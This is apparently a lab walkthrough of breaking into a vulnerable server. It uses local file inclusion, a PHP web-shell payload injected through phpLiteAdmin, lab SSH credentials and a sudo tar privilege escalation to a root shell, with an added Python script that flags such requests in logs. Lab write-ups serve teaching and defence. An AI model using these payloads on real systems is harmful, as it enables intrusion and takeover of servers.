I found that this target has only 3 open ports (22 SSH, 80 HTTP, and 111 RPC). I started with the HTTP port by browsing the website hosted on this web server.
I found view.php linked from the home page.
The "Check them out" button is linked to /view.php?page=tools.html, which means maybe LFI will work.
URL : /view.php?page=../../../../../etc/passwd
So far I had LFI. I enumerated with it but found nothing interesting, so I ran dirb.
phpLiteAdmin v1.9.3 is running in the dbadmin folder.
I logged in by guessing the default password: admin
Exploit Link : https://www.exploit-db.com/exploits/24044
Using this exploit, I successfully exploited phpLiteAdmin to get a shell.
According to the exploit, the steps are:
phpLiteAdmin reveals the full path of the PHP script.
Default Value : "<?php echo system($_GET["cmd"]); ?>"
Now, to call the shell, remember the LFI found earlier. The shell can easily be called from there.
URL : view.php?page=../../usr/databases/hack.php&cmd=id
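Seen from the server side, the view.php requests above are easy to pick out of an access log. The following is an added example, not part of the original write-up, that resolves the page parameter the way the include would and flags values that leave the web root or arrive with extra parameters. The web root /var/www, the log lines and the function names are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

DOC_ROOT = "/var/www"  # assumption: the web root is not stated in the write-up
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined format) mirroring the requests above.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 8355
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1017
198.51.100.7 - - [01/Jan/2024:10:03:41 +0000] "GET /view.php?page=..%2F..%2Fusr%2Fdatabases%2Fhack.php&cmd=id HTTP/1.1" 200 312
"""

def classify(target, doc_root=DOC_ROOT):
    """Return findings for one request target; an empty list means it looks normal."""
    parts = urlsplit(target)
    if not parts.path.endswith("/view.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes once
    findings = []
    for page in params.get("page", []):
        # Resolve the value as the include would see it; an absolute path wins the join.
        resolved = posixpath.normpath(posixpath.join(doc_root, page))
        if not resolved.startswith(doc_root.rstrip("/") + "/"):
            findings.append(f"page resolves outside {doc_root}: {resolved}")
        elif resolved.endswith(".php"):
            findings.append(f"page includes a script: {resolved}")
    extra = sorted(set(params) - {"page"})
    if extra:
        findings.append("unexpected parameters: " + ", ".join(extra))
    return findings

def scan(log_text):
    """Return (line_number, findings) for every suspicious view.php request."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: " + "; ".join(findings))
```

The same resolve-then-compare check, applied inside view.php before the include, is what closes the hole rather than only reporting it.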
Using this LFI, I found the "zico" user's home directory, in which there is a wordpress directory containing the username and password, which can be used to connect over SSH.
Username : zico
Password : sWfCsfJSPV9H3AmQzw8
I can run the tar and zip commands as root without any password.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh